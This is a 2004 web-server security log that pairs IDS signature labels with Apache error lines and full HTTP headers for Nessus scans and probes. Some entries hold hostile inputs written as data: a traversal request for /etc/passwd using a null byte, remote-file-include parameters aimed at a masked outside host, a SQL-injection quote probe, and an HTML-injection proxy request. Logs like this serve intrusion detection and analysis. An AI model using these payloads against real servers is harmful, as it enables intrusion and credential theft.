2321	Nessus 11939	web-application-activity	WEB-IIS foxweb.exe access	Request: 217.160.165.173 - - [Fri Mar 12 22:37:09 2004] "GET /cgi-bin/foxweb.exe HTTP/1.1" 404 298 Handler: cgi-script Error: script not found or unable to stat: /usr/local/apache/cgi-bin/foxweb.exe ---------------------------------------- GET /cgi-bin/foxweb.exe HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2322	Nessus 11939	web-application-activity	WEB-IIS foxweb.dll access	Request: 217.160.165.173 - - [Fri Mar 12 22:37:09 2004] "GET /cgi-bin/foxweb.dll HTTP/1.1" 404 298 Handler: cgi-script Error: script not found or unable to stat: /usr/local/apache/cgi-bin/foxweb.dll ---------------------------------------- GET /cgi-bin/foxweb.dll HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2323	BID9282 Nessus 11975	web-application-activity	WEB-CGI quickstore.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:54 2004] "GET /cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id= HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: Invalid character detected [0] ---------------------------------------- GET /cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id= HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2326	CAN-2002-0375 BID4720 Nessus 11955	web-application-activity	WEB-IIS sgdynamo.exe access	Request: 217.160.165.173 - - [Fri Mar 12 22:41:27 2004] "GET /cgi-bin/sgdynamo.exe?HTNAME=sgdynamo.exe HTTP/1.1" 404 300 Handler: cgi-script Error: script not found or unable to stat: /usr/local/apache/cgi-bin/sgdynamo.exe ---------------------------------------- GET /cgi-bin/sgdynamo.exe?HTNAME=sgdynamo.exe HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2328	Nessus 11982	web-application-activity	WEB-PHP authentication_index.php access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:40 2004] "GET /cgi-bin/authentication_index.php?PGV_BASE_DIRECTORY=http://xxxxxxx/ HTTP/1.1" 404 312 Handler: cgi-script Error: script not found or unable to stat: /usr/local/apache/cgi-bin/authentication_index.php ---------------------------------------- GET /cgi-bin/authentication_index.php?PGV_BASE_DIRECTORY=http://xxxxxxx/ HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2342	BID6525	web-application-attack	WEB-PHP DCP-Portal remote file include attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:39:50 2004] "GET /cgi-bin/library/lib.php?root=http://xxxxxxxxxxx HTTP/1.1" 403 307 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/library ---------------------------------------- GET /cgi-bin/library/lib.php?root=http://xxxxxxxxxxx HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2372	BID9557	web-application-activity	WEB-PHP Photopost PHP Pro showphoto.php access	Request: 217.160.165.173 - - [Fri Mar 12 22:39:12 2004] "GET /cgi-bin/showphoto.php?photo=123' HTTP/1.1" 404 301 Handler: cgi-script Error: script not found or unable to stat: /usr/local/apache/cgi-bin/showphoto.php ---------------------------------------- GET /cgi-bin/showphoto.php?photo=123' HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2393	Nessus 12032 BID9537	web-application-activity	WEB-PHP /_admin access	Request: 217.160.165.173 - - [Fri Mar 12 22:43:00 2004] "GET /cgi-bin/_admin/ HTTP/1.1" 403 299 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/_admin ---------------------------------------- GET /cgi-bin/_admin/ HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2394	BID8014	web-application-attack	WEB-MISC Compaq web-based management agent denial of service attempt	Request: 218.14.135.217 - - [Fri Mar 12 12:14:39 2004] "GET http://rextopia.com/track_lead/24/?height=1%20width=1%20border=0><!--end%20precisionplay--><!--ORB%20TRACKING--><IMG%20SRC= HTTP/1.0" 200 566 Handler: proxy-server Error: mod_security: pausing [http://rextopia.com/track_lead/24/?height=1%20width=1%20border=0><!--end%20precisionplay--><!--ORB%20TRACKING--><IMG%20SRC=] for 50000 ms ---------------------------------------- GET http://rextopia.com/track_lead/24/?height=1%20width=1%20border=0><!--end%20precisionplay--><!--ORB%20TRACKING--><IMG%20SRC= HTTP/1.0 Accept: / Accept-Language: en-us Host: rextopia.com Proxy-~~~~~~~~~~: ~~~~~~~~~~ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) ~~~~~~~: ~~~~:~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~:~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ mod_security-message: Access denied with code 200. Pattern match "<(.\|\n)+>" at THE_REQUEST. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1